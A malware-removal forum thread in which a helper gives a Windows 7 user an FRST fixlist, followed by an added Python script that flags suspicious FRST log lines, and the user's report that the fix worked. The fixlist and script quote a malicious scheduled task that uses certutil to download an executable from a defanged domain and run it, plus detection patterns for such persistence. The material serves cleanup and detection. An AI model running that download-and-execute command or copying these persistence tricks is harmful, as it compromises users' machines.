Hiimky

Windows 7 is infected, can't install malwarebytes


I made a topic about not being able to install Malwarebytes and got a reply that my system is infected and that I should install FRST.exe and do a scan. Here are my FRST and Addition log files. Hope you can help me out. Thanks in advance!

Addition.txt FRST.txt


Hello, Welcome to Malwarebytes.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + R on your keyboard at the same time. This will open the Run box.
Type Notepad and click OK.
Please copy the entire contents of the code box below into the new file.
 

start
CreateRestorePoint:
CloseProcesses:
RemoveProxy:
Unlock: C:\Windows\windefender.exe
HKLM-x32\...\Run: [1cd14e23b8028997e07b33198cd399ea] => C:\Users\thinh\AppData\Local\Temp\svchost.exe .. [24064 2016-08-06] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\Run: [1cd14e23b8028997e07b33198cd399ea] => C:\Users\thinh\AppData\Local\Temp\svchost.exe .. [24064 2016-08-06] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\Run: [CloudNet] => C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-12-30] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\Policies\Explorer: []
Task: {03682A5D-0732-4405-8FC5-CDFF368FC5E4} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4098560 2019-12-26] () [File not signed] <==== ATTENTION
Task: {22E3C056-2A9F-4D5F-B7DD-9E4B2885D528} - System32\Tasks\InstallShield® Update Service Scheduler => C:\Program Files (x86)\Common Files\InstallShield\Update\ISUSPM.exe [387712 2016-06-23] (Flexera Software LLC -> InstallShield®) [File not signed]
Task: {47BBC637-98FF-4AC9-AEE9-7089AF8CB321} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\thinh\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\thinh\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {D26DDF32-50B4-4BE5-9CCE-22BF1D875722} - System32\Tasks\{D35C59E9-7758-4CB3-AAF8-A9CD37F7CEA4} => C:\Windows\system32\pcalua.exe -a "C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {EF7AFDBE-2EF7-4BC5-ACDF-35FADBF4EBDD} - System32\Tasks\InstallShield® Update Helper => C:\Windows\SysWOW64\wscript.exe //nologo //E:jscript //B "C:\ProgramData\InstallShield\Update\isuspm.ini" <==== ATTENTION
Task: C:\Windows\Tasks\InstallShield® Update Helper.job => Wscript.exe J/nologo /E:jscript /B C:\ProgramData\InstallShield\Update\isuspm.ini <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <==== ATTENTION (Restriction - ProxySettings)
ProxyEnable: [HKLM-x32] => Proxy is enabled.
ProxyServer: [HKLM-x32] => http=127.0.0.1:8080;https=127.0.0.1:8080;
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll => No File
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll No File
FF HKU\S-1-5-21-3853315398-2273854794-3376608044-1000\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi => not found
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Program File\bin\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
CHR NewTab: Profile 2 ->  Active:"chrome-extension://dbfmnekepjoapopniengjbcpnbljalfg/index.html"
CHR Extension: (Search Manager) - C:\Users\thinh\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bahkljhhdeciiaodlkppoonappfnheoi [2018-07-14]
CHR Extension: (Tab Mới Infinity - Productivity&Speed Dial) - C:\Users\thinh\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\dbfmnekepjoapopniengjbcpnbljalfg [2019-12-25]
S2 servires; C:\Windows\SysWOW64\1098839.dll [37888 2019-12-13] () [File not signed]
S2 SetPipAtcivator; c:\windows\Fonts\svchost.exe [89088 2019-12-13] (Microsoft Corporation) [File not signed]
S2 snmpstorsrv; C:\Windows\system32\snmpstorsrv.dll [334336 2009-07-14] () [File not signed]
S2 VRLService; C:\ProgramData\ASGVIS\Dongle Utilities\startvrlservice.exe [209408 2014-09-05] () [File not signed]
S2 WinDefender; C:\Windows\windefender.exe [2079744 2019-12-13] (Access Denied)  [File not signed]
S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2019-12-13] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2019-12-13] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) [File not signed]
S1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-12-13] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
NETSVC: vmichapagentsrv -> no filepath.
NETSVC: wmassrv -> no filepath.
NETSVC: snmpstorsrv -> C:\Windows\system32\snmpstorsrv.dll ()
CustomCLSID: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => No File
CustomCLSID: HKU\S-1-5-21-3853315398-2273854794-3376608044-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\TEMP:1CE11B51 [106]
MSCONFIG\startupreg: 1cd14e23b8028997e07b33198cd399ea => "C:\Users\thinh\AppData\Local\Temp\svchost.exe" ..
MSCONFIG\startupreg: CloudNet => "C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe"
MSCONFIG\startupreg: SilentVoice => "C:\Windows\rss\csrss.exe"
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [{3B7E5F3E-7ECB-45CE-86CE-EE2DC8E05954}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe No File
FirewallRules: [{16A61F65-F3B5-42E8-A59C-E49BC025033A}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe No File
FirewallRules: [{F8DD34DC-68EF-4D5A-A247-0D3990286B0F}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe No File
FirewallRules: [{45203E9D-11FC-48C5-9637-702E1D1FF4FE}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe No File
FirewallRules: [TCP Query User{D46B9769-0B5E-4E7F-96E8-65CD7256B951}C:\program files (x86)\electronic arts\eadm\core.exe] => (Allow) C:\program files (x86)\electronic arts\eadm\core.exe No File
FirewallRules: [UDP Query User{B1E04115-19FA-4887-8AF6-C0B80BA29F79}C:\program files (x86)\electronic arts\eadm\core.exe] => (Allow) C:\program files (x86)\electronic arts\eadm\core.exe No File
FirewallRules: [{058F0A76-009F-48B1-8D88-DF2D9745B625}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
FirewallRules: [{8D440B68-9280-441E-8D97-8BD5E7853C4E}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
FirewallRules: [TCP Query User{A8A38572-9BCA-4A25-BDE6-AFB261775505}C:\users\thinh\downloads\programs\lolvninstaller.exe] => (Allow) C:\users\thinh\downloads\programs\lolvninstaller.exe No File
FirewallRules: [UDP Query User{26325EF0-4CD7-4505-BC77-8FAE3DA347FA}C:\users\thinh\downloads\programs\lolvninstaller.exe] => (Allow) C:\users\thinh\downloads\programs\lolvninstaller.exe No File
FirewallRules: [TCP Query User{5124E235-8704-44E1-A59A-21FB2A5F624C}C:\program file\bin\garena plus\garenamessenger.exe] => (Allow) C:\program file\bin\garena plus\garenamessenger.exe No File
FirewallRules: [UDP Query User{09EF55F4-22A5-4578-98AF-433210FE43C8}C:\program file\bin\garena plus\garenamessenger.exe] => (Allow) C:\program file\bin\garena plus\garenamessenger.exe No File
FirewallRules: [TCP Query User{F5C14FF6-2B39-4449-BB49-A8DF16B379CE}C:\program file\bin\ros\ros.exe] => (Allow) C:\program file\bin\ros\ros.exe No File
FirewallRules: [UDP Query User{BD0C993E-1E2D-4D46-B90F-B03BE00ACF0B}C:\program file\bin\ros\ros.exe] => (Allow) C:\program file\bin\ros\ros.exe No File
FirewallRules: [TCP Query User{6E7D7E56-5969-4A39-84E6-D085AA4F0277}C:\program file\bin\ros\ccmini\ccmini.exe] => (Allow) C:\program file\bin\ros\ccmini\ccmini.exe No File
FirewallRules: [UDP Query User{B0E92E83-C70D-4E12-B2EA-364793284434}C:\program file\bin\ros\ccmini\ccmini.exe] => (Allow) C:\program file\bin\ros\ccmini\ccmini.exe No File
FirewallRules: [{82169CD6-4F3F-4524-B22B-B9CB0BAC80DF}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{6527F5C4-406F-4C54-A6C7-020E945E478E}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{EFC9F3E3-5714-4C1A-B14B-FD2627DB7C27}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{8F99FBA4-8CAA-486B-BC3A-363E12832487}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{95447529-F988-4BA2-A168-31589277578E}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{9A0D51F6-4ADF-4329-AA07-5221943E9E1E}] => (Allow) C:\Users\thinh\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe No File
FirewallRules: [{3AF2B537-180F-4E20-A23E-70784F359712}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{7355BBE6-D201-470D-B8E6-A57239A81AED}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{17A7FBE8-6207-41E0-8227-D420B9ABCC0D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{6D97805A-AEF7-49B6-8D00-D32B1289D11C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{5333D9F5-1D53-42D7-8D36-CF46F6B38FCA}] => (Allow) F:\SteamLibrary\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe No File
FirewallRules: [{C68B792E-E0CB-4287-8E9C-8B9942333B97}] => (Allow) F:\SteamLibrary\steamapps\common\Paladins\Binaries\Win32\HirezBridge.exe No File
FirewallRules: [TCP Query User{F08E0949-D516-4194-83D0-F2CD2CE69E54}F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [UDP Query User{C3CE29CB-DB1D-4923-B39E-60ACE9087388}F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) F:\steamlibrary\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [{840DC729-0FE8-49F0-8589-C35376CA340D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [{F364405D-B8CC-4109-9F6A-4DF8628DC1B3}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [TCP Query User{C8B5F3C3-4C56-437A-B6AC-1BDA4F7B0DAE}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe No File
FirewallRules: [UDP Query User{D3CBF347-8224-43BD-9D9A-B756DBFD11B1}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.1\zalo.exe No File
FirewallRules: [TCP Query User{4AB59BAC-CAC3-435E-B9E8-8D50FB4297F3}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe No File
FirewallRules: [UDP Query User{8D78EB32-D0CB-494C-B4AE-9F8EEF971A14}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.2\zalo.exe No File
FirewallRules: [TCP Query User{2A78774F-625F-48CA-9FD6-64A466A91F73}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe No File
FirewallRules: [UDP Query User{D0D163C4-8DBD-4925-ABA6-DF755091C6E7}C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.11.5\zalo.exe No File
FirewallRules: [TCP Query User{624C1464-9A81-4CB7-B5D6-3B764A4754A0}C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe No File
FirewallRules: [UDP Query User{7D02217D-738A-4046-A45C-878FC5135072}C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-18.12.3\zalo.exe No File
FirewallRules: [{E00D815C-9179-449B-A65C-68AF3C65E822}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe No File
FirewallRules: [{B808058C-452F-4BCF-92ED-87D97E755B0C}] => (Allow) E:\New folder (4)\Garena\Garena\2.0.1907.0210\gxxsvc.exe No File
FirewallRules: [TCP Query User{31799DCB-B205-4056-8936-373B37BADA8D}C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe No File
FirewallRules: [UDP Query User{D4EDA43B-FE97-4CB1-B5CF-DCE24583D2F2}C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe] => (Allow) C:\users\thinh\appdata\local\programs\zalo\zalo-19.6.2\zalo.exe No File
FirewallRules: [TCP Query User{9925DDEF-FCDB-496E-9B1C-0FF4FA32A528}C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe] => (Allow) C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe No File
FirewallRules: [UDP Query User{43571F84-7251-4B4A-A02F-941ADC9B435D}C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe] => (Allow) C:\users\thinh\downloads\game-de-che-1\aoe-1\empiresx.exe No File
FirewallRules: [{466ECF9D-674D-4324-A67C-7B3F63054B71}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{7A0F850A-F14F-49D6-94F4-55D4916D49A7}] => (Allow) C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{5D29B22E-AD56-47D8-A2C0-33FFE8A777A4}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{9A28B732-3419-453E-829C-16D08965549C}] => (Allow) C:\Users\thinh\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{474BCBC2-3FA6-4C76-B1DB-BA57760594A8}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
FirewallRules: [{DEC63DE4-0131-49AC-A2CB-0DBC6BC8A5C5}] => (Allow) C:\Users\thinh\AppData\Local\Temp\svchost.exe () [File not signed]
C:\Users\thinh\AppData\Local\Temp\svchost.exe
C:\Users\thinh\AppData\Roaming\EpicNet Inc
C:\Windows\rss\csrss.exe
C:\Users\thinh\AppData\Local\Temp\csrss
C:\Windows\SysWOW64\1098839.dll
c:\windows\Fonts\svchost.exe
C:\Windows\system32\snmpstorsrv.dll
C:\Windows\conhost.exe
C:\Windows\windefender.exe
CMD: netsh int ip reset
CMD: ipconfig /flushDNS
EmptyTemp:
End

Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

If any difficulties remain, please run the Farbar program one more time and post fresh FRST.txt and Addition.txt logs for my review.

Edited by nasdaq

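The fixlist above is, in effect, a set of judgements about FRST log lines: a process named svchost.exe or csrss.exe running from %TEMP%, C:\Windows\Fonts or C:\Windows\rss instead of System32; a scheduled task that uses certutil -urlcache to fetch a payload; a system proxy set to 127.0.0.1:8080 so the malware sees every browser request; drivers signed with a WDK test certificate, which only load when test signing is on or Driver Signature Enforcement has been tampered with. The script below is an added example, not part of FRST and not nasdaq's fixlist. It applies those same heuristics to FRST-format text so they can be re-run over a fresh FRST.txt or Addition.txt. The sample lines are constructed for this example by copying entries from the fixlist; the rule set, the directory list and the regular expression are this example's own assumptions, not anything FRST implements.

```python
"""Triage FRST-style log lines for the persistence patterns seen in this thread.

Added example (not FRST's own code, not the fixlist): reads lines in FRST's text
format and reports the indicators the fix above targets. Sample lines are copied
from the fixlist; the heuristics below are this example's assumptions.
"""
import ntpath
import re

# Windows processes that legitimately run only from System32 / SysWOW64.
SYSTEM_BINARIES = {"svchost.exe", "csrss.exe", "conhost.exe", "lsass.exe",
                   "services.exe", "winlogon.exe", "smss.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Folders a standard user (or a dropper running as one) can write to, plus
# system folders that should never hold executables (Fonts, a stray 'rss').
ODD_DIRS = (r"\appdata\local\temp", r"\appdata\roaming", r"\programdata",
            r"\users\public", r"\windows\temp", r"\windows\fonts", r"\windows\rss")

# A Windows path ending in an executable-ish extension. Segments may contain
# spaces ("Program Files (x86)") but not ':' '&' ';' or brackets, so two paths
# on one line such as 'a.exe && C:\b.exe' are split correctly.
PATH_RE = re.compile(
    r'[A-Za-z]:\\(?:[^\\\[\]:&;"]+\\)*[^\\\[\]:&;" ]+\.(?:exe|dll|sys|ini)', re.I)

# Constructed sample: FRST lines copied/adapted from the fixlist in this thread.
SAMPLE_LINES = r"""
HKLM-x32\...\Run: [1cd14e23b8028997e07b33198cd399ea] => C:\Users\thinh\AppData\Local\Temp\svchost.exe .. [24064 2016-08-06] () [File not signed]
Task: {47BBC637-98FF-4AC9-AEE9-7089AF8CB321} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\thinh\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\thinh\AppData\Local\Temp\csrss\scheduled.exe /31340
ProxyServer: [HKLM-x32] => http=127.0.0.1:8080;https=127.0.0.1:8080;
S2 SetPipAtcivator; c:\windows\Fonts\svchost.exe [89088 2019-12-13] (Microsoft Corporation) [File not signed]
S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2019-12-13] (WDKTestCert Admin,131480495282941941 -> ) [File not signed]
Task: {22E3C056-2A9F-4D5F-B7DD-9E4B2885D528} - System32\Tasks\InstallShield Update Service Scheduler => C:\Program Files (x86)\Common Files\InstallShield\Update\ISUSPM.exe [387712 2016-06-23] (Flexera Software LLC -> InstallShield) [File not signed]
FirewallRules: [{3AF2B537-180F-4E20-A23E-70784F359712}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
"""


def check_line(line: str) -> list[str]:
    """Return the reasons one FRST line deserves attention (empty list if none)."""
    reasons = []
    low = line.lower()
    unsigned = "[file not signed]" in low
    for path in dict.fromkeys(PATH_RE.findall(line)):  # dedupe, keep order
        p = path.lower()
        name, parent = ntpath.basename(p), ntpath.dirname(p)
        if name in SYSTEM_BINARIES and parent not in SYSTEM_DIRS:
            reasons.append(f"system process name outside System32/SysWOW64: {path}")
        if any(d + "\\" in p for d in ODD_DIRS):
            tag = "unsigned " if unsigned else ""
            reasons.append(f"{tag}binary launched from a user-writable or odd folder: {path}")
    if "certutil" in low and "-urlcache" in low:
        reasons.append("certutil -urlcache used as a downloader (LOLBin)")
    if low.startswith("proxyserver:") and "127.0.0.1:" in low:
        reasons.append("system proxy points at localhost: browser traffic is intercepted")
    if "wdktestcert" in low:
        reasons.append("driver signed with a WDK test certificate (needs test signing or DSE tampering to load)")
    if "wscript" in low and "e:jscript" in low and ".ini" in low:
        reasons.append("script engine forced on a non-script extension (.ini run as JScript)")
    return reasons


def triage(text: str) -> list[tuple[int, list[str]]]:
    """Run check_line over every line; return (1-based line number, reasons) for hits only."""
    hits = []
    for n, line in enumerate(text.strip().splitlines(), start=1):
        reasons = check_line(line)
        if reasons:
            hits.append((n, reasons))
    return hits


if __name__ == "__main__":
    for n, reasons in triage(SAMPLE_LINES):
        print(f"line {n}:")
        for r in reasons:
            print(f"  - {r}")
```

On the sample the InstallShield task and the Steam firewall rule come back clean; the five other lines are flagged for the same reasons the fixlist removes them. The signature check is deliberately only a tag, not a gate: the Fonts\svchost.exe service line carries a "Microsoft Corporation" company name yet is unsigned, which is exactly why a string match on the vendor is not enough.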

Hi nasdaq. I had cloudnet.exe running in my background and it always spiked my CPU usage up to 80-90% every time I used my PC, and I couldn't completely remove it manually, hence the reason I'm trying to install Malwarebytes. Surprisingly, after running the FRST 'fix' cloudnet doesn't appear and my CPU usage is down to <10%. Here is my Fixlog:

Fixlog.txt


Hi,

Glad we could help.

As suggested, if any problem remains, post fresh logs after running the Farbar program one more time.


Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread.

Thanks
